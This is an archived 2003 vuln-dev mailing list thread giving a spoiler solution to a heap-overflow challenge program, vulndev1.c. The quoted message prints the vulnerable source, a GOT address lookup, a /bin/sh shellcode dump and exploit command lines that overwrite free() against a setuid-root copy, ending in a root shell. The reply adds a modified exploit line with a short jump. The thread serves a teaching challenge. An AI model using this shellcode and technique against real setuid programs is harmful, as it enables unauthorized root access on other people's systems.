|
|
| Applications |
| Mailing Lists |
| Miscellaneous |
| Operating Systems |
| Programming |
RE: vulndev1.c solution (warning SPOILER)
Date: Wed May 14 2003 - 05:43:29 EDT
This *almost* worked for me, but not quite. After figuring out the correct addresses to substitute, I was still getting segfaults. After some playing I tried the following, which worked for me:
./vuln1 `printf "\xeb\x0c"``perl -e 'print "A"x204;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`
Adding the "\xeb\x0c" jumps over the damage done by free() at p1+8. I'm not sure I understand yet how it could have worked for you without the jump. My free() damage was a call into bad memory, maybe yours was somehow something less disruptive?
Thanks very much Jose for posting this spoiler, and thanks Dave McKinney and Aaron Adams for posing this challenge to the list. As a newcomer I have learned more in one day today about exploits than I have in the past 2 months of watching this list.
Cameron
-----Original Message-----
From: Jose Ronnick [mailto:matrix@phiral.com]
Sent: Tuesday, May 13, 2003 6:23 PM
To: vuln-dev@securityfocus.com
Subject: Re: vulndev1.c solution (warning SPOILER)
Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further..
matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadams@securityfocus.com>
// Spot the error in this program.
#include <stdio.h>
#include <stdlib.h>
#define SIZE 252
int
main(int argc, char *argv[])
{
int i;
char *p1, *p2;
char *buf1 = malloc(SIZE);
char *buf2 = malloc(SIZE);
if (argc != 3)
exit(1);
p1 = argv[1], p2 = argv[2];
printf("p1 is at %p\n", p1); // DEBUG
strncpy(buf2, p2, SIZE);
for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
buf1[i] = p1[i];
free(buf1);
free(buf2);
return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root ./vuln1 matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1 matrix@overdose vuln-dev $ objdump -R ./vuln1
./vuln1: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049654 R_386_GLOB_DAT __gmon_start__
0804963c R_386_JUMP_SLOT malloc
08049640 R_386_JUMP_SLOT __libc_start_main
08049644 R_386_JUMP_SLOT printf
08049648 R_386_JUMP_SLOT exit
0804964c R_386_JUMP_SLOT free
08049650 R_386_JUMP_SLOT strncpy
matrix@overdose vuln-dev $ pcalc 0x4c-12
64 0x40 0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210
c031 46b0 db31 c931 80cd 16eb 315b 88c0 0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f
0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53 0000040 315 200 350 345 377 377 377 / b i n / s h
80cd e5e8 ffff 2fff 6962 2f6e 6873
0000056
matrix@overdose vuln-dev $ wc -c shell
46 shell
matrix@overdose vuln-dev $ pcalc 252-46
206 0xce 0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat
shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at
0xbffff839 Segmentation fault matrix@overdose vuln-dev $ ./vuln1 `perl
-e 'print "A"x206;'``cat shell``printf "\x0b"` `printf
"\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#
questions? comments? >=)
--
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXq
v-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-
Received on Wed May 14 11:36:18 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT
|
Contact Us Legal Notices Order Services Online Pantek Home Privacy Policy IT news Site Map Pantek Library |